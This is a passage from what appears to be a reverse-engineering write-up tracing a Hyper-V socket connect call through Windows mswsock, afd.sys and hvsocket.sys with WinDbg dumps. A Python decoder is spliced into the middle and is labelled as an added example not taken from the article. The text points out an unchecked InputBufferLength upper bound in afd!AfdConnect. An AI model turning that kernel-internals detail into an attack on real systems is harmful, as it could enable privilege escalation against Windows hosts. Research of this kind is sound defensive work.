<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Input buffer before the NtDeviceIoControlFile call (with IOCTL 12003) from mswsock!WSPBind:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc 007D4930 007D4930+28</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">007d4930 00000002 baad0022 00000000 00000000 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">007d4940 00000000 00000000 00000000 00000000 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">007d4950 00000000 00000000</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Input buffer after call:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc 007D4930 007D4930+24</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">007d4930 00000022 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">90db8b89 4f790d35 ea49e98c</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> - </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_GUID_CHILDREN</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">007d4940 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">cdb7c80a</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000000 00000000 00000000 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">007d4950 00000000 00000000</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then we return from mswsock!WSPBind.</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next comes</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> mswsock!SockDoConnectReal</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, from which </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">ntdll!NtDeviceIoControlFile </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">is called: </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NTSTATUS WINAPI NtDeviceIoControlFile(</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE FileHandle, - 144 File (---) \Device\Afd)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE Event, - 140 (Event)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PIO_APC_ROUTINE ApcRoutine, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID ApcContext, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PIO_STATUS_BLOCK IoStatusBlock, 0036F4C0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG IoControlCode, 00012007 (afd!AfdConnect)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID InputBuffer, </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0036F4E8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG InputBufferLength,30</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PVOID OutputBuffer, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG OutputBufferLength 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">0:000> k</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># ChildEBP RetAddr </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 00cff670 7232df2b ntdll!NtDeviceIoControlFile</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 00cff724 7232dc08 mswsock!SockDoConnectReal+0x2c6</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 00cff7b0 7232e3af mswsock!SockDoConnect+0x412</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 00cff7cc 75ae4d76 mswsock!WSPConnect+0x1f</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 00cff81c 009711df WS2_32!connect+0x86</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dd 0036F4E8 0036F4E8+30</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0036f4e8 007d4800 00000000 007e1270 00000022</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0036f4f8 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">a42e7cda 480cd03f dea4c29c 78b8ab20</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0036f508 </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">b1d00d3e 4570fe10 487662ad 1b7a9d77</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dtx _GUID 0036F4E8+10</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(*((_GUID *)0x36f4f8)) : {A42E7CDA-D03F-480C-9CC2-A4DE20ABB878} [Type: _GUID] - </span><span style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_GUID_PARENT</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [<Raw View>] [Type: _GUID]</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dtx _GUID 0036F4E8+20</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(*((_GUID *)0x36f508)) : {B1D00D3E-FE10-4570-AD62-7648779D7A1B} [Type: _GUID] – GUID of our service.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [<Raw View>] [Type: _GUID]</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We pass into the kernel, into the afd!AfdConnect function. First it checks whether the call came from a 32-bit or a 64-bit process (nt!IoIs32bitProcess). Then the size of the passed buffer (0x22 in our case) is compared with AfdStandardAddressLength (equal to 1Ch); the size of this structure is 24h, so a pool block of 24h bytes is allocated (ExAllocatePoolWithTagPriority) and the passed buffer is copied into it. Interestingly, the upper bound of InputBufferLength is not checked in any way: from user mode we can pass a buffer of any size, and that size, minus 0xC, is handed to the nt!ExAllocatePoolWithTagPriority function.</span></div>
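<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The two address buffers dumped above (the bind buffer after the WSPBind call, and the 0x30-byte input buffer of the AfdConnect IOCTL) can be decoded offline. The Python script below is an added example, not code from this article or from Microsoft: it re-types the article's dd/dc output as constructed sample input, treats the first 0xC bytes of the connect buffer as an opaque header (an assumption based on the 0xC that AfdConnect subtracts from InputBufferLength), decodes the SOCKADDR_HV that follows (2-byte family, 2-byte reserved, 16-byte VmId, 16-byte ServiceId, 0x24 bytes in total), names the well-known VmId constants from hvsocket.h, and applies the upper-bound check on InputBufferLength that, as noted above, afd!AfdConnect itself does not perform.</span></div>

```python
"""Decode AF_HYPERV socket addresses from WinDbg dword dumps.

Added example, not code from the article: the dump text below is the
article's `dd`/`dc` output re-typed here as constructed sample input.
"""
import re
import uuid
from dataclasses import dataclass

AF_HYPERV = 0x22               # address family seen in the dumps (34 decimal)
SOCKADDR_HV_SIZE = 0x24        # family(2) + reserved(2) + VmId(16) + ServiceId(16)
AFD_CONNECT_HEADER_SIZE = 0xC  # the 0xC afd!AfdConnect subtracts from InputBufferLength;
                               # assumed here to be an opaque header preceding the sockaddr

# Well-known VmId values from hvsocket.h (HV_GUID_ZERO and HV_GUID_WILDCARD are both all-zero).
WELL_KNOWN_VMIDS = {
    uuid.UUID("00000000-0000-0000-0000-000000000000"): "HV_GUID_ZERO/HV_GUID_WILDCARD",
    uuid.UUID("ffffffff-ffff-ffff-ffff-ffffffffffff"): "HV_GUID_BROADCAST",
    uuid.UUID("90db8b89-0d35-4f79-8ce9-49ea0ac8b7cd"): "HV_GUID_CHILDREN",
    uuid.UUID("e0e16197-dd56-4a10-9195-5ee7a155a838"): "HV_GUID_LOOPBACK",
    uuid.UUID("a42e7cda-d03f-480c-9cc2-a4de20abb878"): "HV_GUID_PARENT",
}

# Constructed sample input: the article's `dd 0036F4E8` dump of the 0x30-byte AfdConnect input buffer.
CONNECT_DUMP = """
0036f4e8 007d4800 00000000 007e1270 00000022
0036f4f8 a42e7cda 480cd03f dea4c29c 78b8ab20
0036f508 b1d00d3e 4570fe10 487662ad 1b7a9d77
"""

# Constructed sample input: the article's `dc 007D4930` dump of the bind buffer after the call.
BIND_AFTER_DUMP = """
007d4930 00000022 90db8b89 4f790d35 ea49e98c
007d4940 cdb7c80a 00000000 00000000 00000000
007d4950 00000000 00000000
"""


@dataclass
class SockaddrHv:
    family: int
    reserved: int
    vm_id: uuid.UUID
    service_id: uuid.UUID


def parse_dump(text: str) -> bytes:
    """Turn WinDbg `dd`-style lines (address, then little-endian dwords) into raw bytes."""
    out = bytearray()
    for line in text.strip().splitlines():
        words = re.findall(r"\b[0-9a-f]{8}\b", line.lower())
        for word in words[1:]:  # words[0] is the address column
            out += int(word, 16).to_bytes(4, "little")
    return bytes(out)


def guid_str(g: uuid.UUID) -> str:
    """Format a GUID the way WinDbg's `dtx _GUID` prints it."""
    return "{" + str(g).upper() + "}"


def vmid_name(g: uuid.UUID) -> str:
    """Name a well-known VmId, or flag it as VM-specific."""
    return WELL_KNOWN_VMIDS.get(g, "(VM-specific or unknown VmId)")


def decode_sockaddr_hv(buf: bytes, offset: int = 0) -> SockaddrHv:
    """Decode one SOCKADDR_HV at `offset`; GUIDs use the Windows mixed-endian byte order."""
    if len(buf) - offset < SOCKADDR_HV_SIZE:
        raise ValueError("buffer too short for SOCKADDR_HV")
    family = int.from_bytes(buf[offset:offset + 2], "little")
    reserved = int.from_bytes(buf[offset + 2:offset + 4], "little")
    vm_id = uuid.UUID(bytes_le=buf[offset + 4:offset + 20])
    service_id = uuid.UUID(bytes_le=buf[offset + 20:offset + 36])
    return SockaddrHv(family, reserved, vm_id, service_id)


def decode_afd_connect_input(buf: bytes, input_length: int) -> SockaddrHv:
    """Decode the address after the 0xC header, bounding InputBufferLength on both sides.

    The upper-bound check is the one the article notes is absent in afd!AfdConnect,
    where InputBufferLength - 0xC flows straight into the pool allocation size.
    """
    if input_length > len(buf):
        raise ValueError("InputBufferLength exceeds the bytes actually captured")
    if input_length < AFD_CONNECT_HEADER_SIZE + SOCKADDR_HV_SIZE:
        raise ValueError(f"InputBufferLength 0x{input_length:x} too small for SOCKADDR_HV")
    addr_len = input_length - AFD_CONNECT_HEADER_SIZE
    if addr_len > SOCKADDR_HV_SIZE:
        raise ValueError(f"address length 0x{addr_len:x} exceeds sizeof(SOCKADDR_HV) = 0x24")
    sa = decode_sockaddr_hv(buf, AFD_CONNECT_HEADER_SIZE)
    if sa.family != AF_HYPERV:
        raise ValueError(f"unexpected address family 0x{sa.family:x}")
    return sa


def describe(sa: SockaddrHv) -> str:
    """One-line human-readable summary of a decoded address."""
    return (f"family=0x{sa.family:x} VmId={guid_str(sa.vm_id)} ({vmid_name(sa.vm_id)}) "
            f"ServiceId={guid_str(sa.service_id)}")


if __name__ == "__main__":
    print("connect:", describe(decode_afd_connect_input(parse_dump(CONNECT_DUMP), 0x30)))
    print("bind:   ", describe(decode_sockaddr_hv(parse_dump(BIND_AFTER_DUMP))))
```

<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Run as-is, the script recovers HV_GUID_PARENT and the service GUID {B1D00D3E-FE10-4570-AD62-7648779D7A1B} from the connect buffer (0x30 - 0xC = 0x24, exactly one SOCKADDR_HV), and HV_GUID_CHILDREN with an all-zero ServiceId from the post-bind buffer. Passing an InputBufferLength larger than 0x30 makes decode_afd_connect_input raise instead of silently accepting the oversized length.</span></div>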
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next SOCKADDR_SIZE is called, a function that looks up the socket address size in an array indexed by the protocol number:</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="40" src="https://lh3.googleusercontent.com/cZxbW6FsKM07T4Q2CDYSWzqIg1aI2nuKxx0PMRnZ99f-idLAT1DRLLDSOTp-RqaDRRJHnZZ0tBGFELnOxaYCCPscBYrObWL_C7rsOlyl30MBP34jrKn-Lblk6mRcCiqPwl-SN_IR_55gw7ueLQ" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="453" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After numerous checks afd!AfdCreateConnection is called (rcx holds a pointer to an element of the afd!AfdTlTransportListHead list). The number of elements in this list can be seen with the WinDbg mex extension (if you do not want to bother with the !list command):</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!mex.foreachitem afd!AfdTlTransportListHead -c</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff80535407530</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffc80e74a37bf0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffc80e74814b10</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffc80e742a9400</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffc80e742a9320</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Processed 5 items.</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">From there nt!PsChargeProcessPoolQuota is called, which works with the PplConnectionPool variable. Then a 100h-byte memory area is zeroed and ExpInterlockedPopEntrySList is called: a new _AFD_CONNECTION structure starts to be formed, with 0xAFD8 written to its "type" field. Then afd!AfdTimerWheelInitializeEntry is called, followed by nt!ObfReferenceObject with the ClientExample.exe process as the object. afd!AfdReceiveWindowSize and afd!AfdSendWindowSize are stored into the structure at offsets +90h and +94h respectively. Then esi (where the 3rd AfdCreateConnection parameter is loaded) is checked: if it is 0, nt!IoCreateFile is called, but in our case it is 1. We return from afd!AfdCreateConnection. afd!AfdAddConnectedReference is called (1st parameter is a pointer to the _AFD_CONNECTION): it sets bit 16 of this structure to 1 and increments the field at 48h by 1. Then afd!AfdEnableFailedConnectEvent is called (it clears bit 8 at offset 3Ch and zeroes the DWORD at offset 18Ch of the same structure). Then afd!AfdGetEndpointConnectDispatch (which returns either the address of afd!AfdTlClientConnectDispatch or, if byte 7 of the _AFD_CONNECTION equals 10h, AfdRioTlClientConnectDispatch) and afd!AfdRefTLBaseEndpoint are executed. </span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlProviderConnect</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> is called. Inside it, hvsocket!VmbusTlEndpointIsPrivileged and hvsocket!VmbusTlValidateSockAddress are called (the structure of two GUIDs given in the socket parameters by the ClientExample application is passed in rdx; the Address Family value is checked to be 0x22, and the passed GUID is checked by hvsocket!VmbusTlIsServiceEnabled to see whether the service exists). hvsocket!VmbusTlFindOrCreateService is called from hvsocket!VmbusTlIsServiceEnabled and searches for the GUID in a list built from the service values in the registry:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!mex.foreachitem @rdx -x "dt nt!_GUID @#Item+10"</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Item #1 @ 0xffffaf89af0af750</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!_GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> {999e53d4-3d5c-4c3e-8779-bed06ec056e1}</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Item #2 @ 0xffffaf89adac0200</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!_GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> {a5201c21-2770-4c11-a68e-f182edb29220}</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Item #3 @ 0xffffaf89ade0c870</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!_GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
